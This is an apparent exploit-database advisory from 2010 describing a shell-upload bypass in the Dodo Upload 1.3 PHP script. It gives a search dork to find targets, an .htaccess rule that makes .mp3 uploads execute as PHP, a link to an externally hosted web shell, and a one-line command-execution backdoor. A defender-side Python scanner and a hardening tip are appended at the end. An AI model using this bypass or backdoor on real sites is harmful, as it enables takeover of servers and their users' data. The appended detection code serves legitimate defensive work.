Dodo Upload Version 1.3 Upload Shell (By pass) Vulnerability

2010-02-15T00:00:00
ID 1337DAY-ID-10912
Type zdt
Reporter indoushka
Modified 2010-02-15T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
Dodo Upload Version 1.3 Upload Shell (By pass) Vulnerability 
============================================================

========================================================================================                 
| # Title    : Dodo Upload Version 1.3 Upload Shell (By pass) Vulnerability                   
| # Author   : indoushka                                 
| # Total alerts found : 1                                               
|                High  : 1                                                                      
|              Medium  :                                                                       
|                  Low :                                                                           
|       Informational  :                                                            
| # Web Site : www.iq-ty.com                                                          
| # Published: http://regretless.com/scripts/                                                                       
| # Dork     : Powered by Dodo, Bubo & Misty. Feed us!                           
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Linux Français v.(9.4 Ubuntu)      
| # Bug      : Shell upload                                                                    
======================      Exploit By indoushka       =================================
 # Exploit  :
  
 1- Shell upload
 
http://localhost/dodoupload/index.php
 
To bypass the uploader, put this code in a text document and save it as .htaccess
 
code :
 
<FilesMatch "^.*\.mp3">
   SetHandler application/x-httpd-php
</FilesMatch>
 
Now save your evil PHP file with an .mp3 extension
 
Example: evil.mp3 (http://www.freewebtown.com/indoushka/indoushka/ch99.php)
 
Find your evil file at
 
http://localhost/dodoupload/evil.mp3
 
You can also upload a simple backdoor
 
code :
 
<?php
$cmd = $_GET['cmd'];
system($cmd);
?>
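
A defender-side check for the condition described above, added here as an example (not part of the original advisory and not Dodo Upload code): it scans an upload directory for .ht* override files that map a handler to PHP and for non-script files that contain a PHP open tag. The function names, rule labels and sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Directives that can remap a file type to the PHP handler (assumed list, extend as needed).
HANDLER_RE = re.compile(
    r"^\s*(SetHandler|AddHandler|AddType|ForceType)\b.*php", re.I | re.M)
PHP_TAG = b"<?php"
SCRIPT_EXT = {".php", ".phtml", ".phar"}  # should never appear in an upload directory


def scan_upload_dir(root):
    """Return sorted (relative_path, rule) findings for files under root."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        head = path.read_bytes()[:65536]  # the first 64 KiB is enough for these checks
        name = path.name.lower()
        rel = str(path.relative_to(root))
        if name.startswith(".ht"):
            # Any per-directory override file in a writable upload path is suspect;
            # one that maps a handler to PHP matches the bypass described above.
            remaps = HANDLER_RE.search(head.decode("utf-8", "replace"))
            findings.append((rel, "htaccess-remaps-php" if remaps else "override-file"))
        elif path.suffix.lower() in SCRIPT_EXT:
            findings.append((rel, "script-in-upload-dir"))
        elif PHP_TAG in head.lower():
            findings.append((rel, "php-in-non-script"))
    return findings


def build_sample(root):
    """Write constructed sample files (not real uploads) for a demonstration run."""
    root = Path(root)
    (root / ".htaccess").write_text(
        '<FilesMatch "^.*\\.mp3">\n   SetHandler application/x-httpd-php\n</FilesMatch>\n')
    (root / "evil.mp3").write_bytes(b"<?php echo 'constructed sample'; ?>")
    (root / "song.mp3").write_bytes(b"ID3\x03\x00\x00\x00\x00\x00\x0f" + b"\x00" * 32)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for rel, rule in scan_upload_dir(tmp):
            print(f"{rule:22} {rel}")
```

Any finding in a directory that the web application can write to warrants review; setting AllowOverride None for that directory in the server configuration stops Apache from reading an uploaded .htaccess at all.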


